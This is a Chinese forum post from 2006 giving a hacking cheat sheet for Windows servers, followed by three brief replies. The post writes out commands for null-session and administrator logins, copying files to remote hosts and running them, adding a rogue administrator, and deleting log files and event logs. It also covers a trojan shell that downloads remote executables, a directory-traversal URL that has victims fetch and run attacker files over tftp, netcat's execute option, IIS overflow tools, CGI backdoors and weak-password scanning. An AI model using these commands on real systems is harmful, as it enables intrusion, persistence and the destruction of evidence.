社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3585阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 5mD]uB9  
常用的几条NET命令: CmNd0S4v  
xi]qdiA  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" ]KS|r+  
=jX'FNv#  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" 0"~`U.k~M  
RfMrGC^?  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ j zaC  
 ;Q;u^T`  
(查看远程主机时间) net time \\IP地址 _z<y]?q  
s.E}xv  
(定时启动某个程序) at \\IP地址 02:18 readme.exe ]8|cV GMa  
)vFJx[a<n`  
(查看共享) net view \\IP地址 BTwLx-p9t  
TS9=A1J#  
(查看netbios工作组列表) nbtstat -A IP地址 >4A~?=  
Gu-*@C:^&  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" cC.=,n  
ic}M)S FD;  
(这两条把自己增加到管理员组): net user 用户名 密码 /add y;+5cn C  
'Jb6CR n  
net localgroup Administrators 用户名 /add *uAsKU  
\4RVJ[2  
(断开连接) net use \\IP地址\ipc$ /delete . mDh9V5  
nwk66o:|  
扫尾: ps#+i  
$td=h)S^`  
del C:\winnt\system32\logfiles\*.* D{&0r.2F  
'1lr "}"Q+  
del C:\winnt\ssytem32\config\*.evt nDh]: t=  
cSYW)c|t  
del C:\winnt\system32\dtclog\*.* | fMjg'%{}  
g0m6D:f  
del C:\winnt\system32\*.log EK^B=)q6:W  
;- D1n  
del C:\winnt\system32\*.txt bwjjwu&  
3@ a  
del C:\winnt\*.txt JJHr<|K  
WxE4r  
del C:\winnt\*.log yJx{6  
B/S~Jn  
一、netsvc.exe -9XB.)\#  
VtX9}<Ch~  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: #On EQ:  
lP>}9^7I!  
netsvc /list \\IP地址 Vy-EY*r|  
C3n_'O  
netsvc schedule \\IP地址 /query 2\flTO2Ny  
;}!hgyq  
netsvc \\IP地址 schedule /start g">E it*[  
=Rl?. +uE  
二、OpenTelnet.exe HH>"J /;c,  
cTO\Vhg  
远程启动主机的Telnet服务,并绑定端口到7878,例如: 8Wn;U!qT  
wN[mU  
OpenTelnet \\IP地址 用户名 密码 1 7878 ;2||g8'  
-c-#1_X5  
然后就可以telnet到主机的7878端口,进入DOS方式下: C WJGr:}&  
En:.U9?X  
telnet IP地址 7878 bkQEfx.  
Vy;f4;I{  
三、winshell.exe <MgR x9  
2%YtMkC5  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: > uS?Nz5/  
bi:m;R  
p Path (查看winshell主程序的路径信息) adG=L9 "n  
nezdk=8J/  
b reBoot (重新启动机器) 0h~Iua5  
R;9H`L/>  
d shutDown (关闭机器) hlPZTr=a  
9Foo8e  
s Shell (执行后你就会看到可爱的“C:\>”) )D ^.{70N  
XeD9RMT  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) q2* G86  
@1#QbNp#  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) jseyT#2  
! 6kLL  
四、3389登陆器,GUI方式登录远程主机的  y{h y  
+{V"a<D$m  
五、elsave.exe V`OeJVe  
]I9Hbw  
事件日志清除工具 GzJLG=M  
a+$WlG/x  
elsave -s \\IP地址 -l "application" -C z4f\0uQ  
[#y/`  
elsave -s \\IP地址 -l "system" -C AtRu)v6r  
ZCJOh8  
elsave -s \\IP地址 -l "security" -C 3.q%?S}*  
tGGv 2TCEy  
执行后成功清除应用程序日志,系统日志,安全日志 T+z]ztO  
pK=$)<I"6  
六、hbulot.exe 90)0\i+P  
w ^ v*1KA&  
开启win2kserver和winxp的3389服务 2Yd0:$a  
808E)  
hbulot [/r] ,3_;JT"5  
R:zPU   
使用/r表示安装完成后自动重起目标使设置生效。 +NGjDa  
acuch  
七、nc.exe(netcat.exe) (pBOv:6  
oQgd]| v  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 y5_`<lFv  
Ri]7=.QI`  
想要连接到某处: nc [-options] hostname port[s] [ports] ... & 2MI(9v  
RZm}%6##ZC  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 0-H!\IB  
_3UH"9g{  
参数: z;:c_y!f  
6QsH?!bu  
-e prog 程序重定向,一旦连接,就执行 [危险!!] 3L$_OXx  
(lwrk(  
-g gateway source-routing hop point[s], up to 8 TRwlUC3hQ  
KlMrM% ;y  
-G num source-routing pointer: 4, 8, 12, ... #3@ Du(_n  
k9j_#\E[  
-h 帮助信息 iOpMU  
_@CY_`a  
-i secs 延时的间隔 ;Ee!vqD2  
u.( WW(/N  
-l 监听模式,用于入站连接 QFOmnbJg  
5mB%Xh;bg  
-n 指定数字的IP地址,不能用hostname ]>fAV(ix  
YUo{e=m|  
-o file 记录16进制的传输 7a_pO1MBL  
|;2Y|>=  
-p port 本地端口号 $mvcqn;  
-<kl d+  
-r 任意指定本地及远程端口 2Y_ `&  
-x~h.s,  
-s addr 本地源地址 *<k8H5z8]  
.'o<.\R8  
-u UDP模式 < aeBhg%  
"p>$^   
-v 详细输出——用两个-v可得到更详细的内容 <ijf':X=*  
OgJd^  
-w secs timeout的时间 K;jV"R<9  
;cQhs7m(9  
-z 将输入输出关掉——用于扫描时 NpV# zzE  
八、TFTPD32.EXE (Fq|hgOA>M  
HRkO.230  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: ^)ouL25Z*2  
7Q,9j.  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 <V?M~u[7f  
DDkH`R  
然后可以直接令文件运行: VXt8y)?a  
G t 4| ]  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 {~.~ b+v  
"&jA CI  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 `f.okqBAh  
X|+o4R?  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 ^lVZW8  
,KvF:xqA  
一、一 Xscan命令行运行参数说明: cIqk=_]  
L[\m{gN  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 "]M:+mH{]  
tpe:]T/xh  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] JmDi{B?  
j^ L"l;m  
xscan -file <主机列表文件名> <检测项目> [其他选项] MhMY"bx8  
)cA#2mlS'1  
其中<检测项目> 含义如下: Jy&O4g/'5  
[{.e1s<EK  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); Q 6djfEN>  
OiI[w8  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); #<ppiu$  
r|$@Wsb?#  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); ^Rr0)4ns  
Pw`26mB   
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); O@;;GJ  
=zw=J p  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); ~jdvxoX-  
eELJDSd BV  
[其他选项] 含义如下: OO?d[7Wt0  
=O= 0 D  
-v: 显示详细扫描进度 :s8^nEK  
K)z{R n  
-p: 跳过Ping不通的主机 6"@+Jz  
0* Ox>O>  
-o: 跳过没有检测到开放端口的主机 .!uXhF'  
*_G(*yAe(  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 W?y7mw_S  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八